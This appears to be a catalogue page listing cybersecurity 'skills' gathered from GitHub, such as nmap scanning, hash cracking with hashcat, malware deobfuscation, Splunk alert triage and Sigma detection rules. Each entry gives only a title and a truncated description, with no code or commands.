GitHub
Skills harvested from GitHub repositories
14810 skills availableperforming-endpoint-vulnerability-remediation
Use this skill when: Remediating vulnerabilities identified by scanners (Nessus, Qualys, Rapid7) Responding to zero-day ...
performing-lateral-movement-detection
Use this skill when: SOC teams need to detect attackers pivoting between systems after initial compromise Incident inves...
detecting-deepfake-audio-in-vishing-attacks
A suspected vishing call used an AI-cloned executive voice to authorize a wire transfer Security operations received a v...
scanning-network-with-nmap-advanced
Performing comprehensive asset discovery across large enterprise networks during authorized assessments Enumerating serv...
implementing-mitre-attack-coverage-mapping
MITRE ATT&CK coverage mapping gives SOC teams a structured, adversary-centric lens to evaluate detection capabilities. E...
implementing-mimecast-targeted-attack-protection
Mimecast Targeted Threat Protection (TTP) is a suite of advanced email security services designed to protect against sop...
conducting-api-security-testing
Testing API endpoints for authorization flaws, injection vulnerabilities, and business logic bypasses Assessing the secu...
implementing-github-advanced-security-for-code-scanning
GitHub Advanced Security (GHAS) integrates CodeQL-powered static application security testing directly into the GitHub d...
conducting-post-incident-lessons-learned
After any security incident has been fully resolved and recovery completed Following tabletop exercises or IR simulation...
analyzing-ransomware-encryption-mechanisms
A ransomware infection has occurred and recovery requires understanding the encryption scheme used Assessing whether dec...
building-identity-federation-with-saml-azure-ad
Identity federation enables users authenticated by one identity provider to access resources managed by another without ...
analyzing-web-server-logs-for-intrusion
When investigating security incidents that require analyzing web server logs for intrusion When building detection rules...
implementing-digital-signatures-with-ed25519
Ed25519 is a high-performance digital signature algorithm using the Edwards curve Curve25519. It provides 128-bit securi...
performing-network-packet-capture-analysis
Network packet captures (PCAP/PCAPNG files) represent the ultimate source of truth about network activity and provide ir...
deobfuscating-javascript-malware
Investigating a phishing page with obfuscated JavaScript that performs credential harvesting or redirect Analyzing a web...
performing-cloud-asset-inventory-with-cartography
Cartography is a CNCF sandbox project (originally created at Lyft) that consolidates infrastructure assets and their rel...
detecting-aws-iam-privilege-escalation
This skill uses boto3 and Cloudsplaining-style analysis to identify IAM privilege escalation paths in AWS accounts. It d...
analyzing-pdf-malware-with-pdfid
A suspicious PDF attachment has been flagged by email security or reported by a user You need to determine if a PDF cont...
performing-hash-cracking-with-hashcat
Hash cracking is an essential skill for penetration testers and security auditors to evaluate password strength. Hashcat...
analyzing-powershell-empire-artifacts
PowerShell Empire is a post-exploitation framework consisting of listeners, stagers, and agents. Its artifacts leave det...
triaging-security-alerts-in-splunk
Use this skill when: SOC Tier 1 analysts need to process the Incident Review queue in Splunk Enterprise Security (ES) No...
implementing-ot-network-traffic-analysis-with-nozomi
When deploying passive OT network monitoring using Nozomi Networks Guardian sensors When requiring asset visibility with...
implementing-mobile-application-management
Use this skill when: Deploying enterprise mobile app protection without full device management (MDM) Implementing BYOD p...
building-detection-rules-with-sigma
Use this skill when: SOC engineers need to create detection rules portable across multiple SIEM platforms Threat intelli...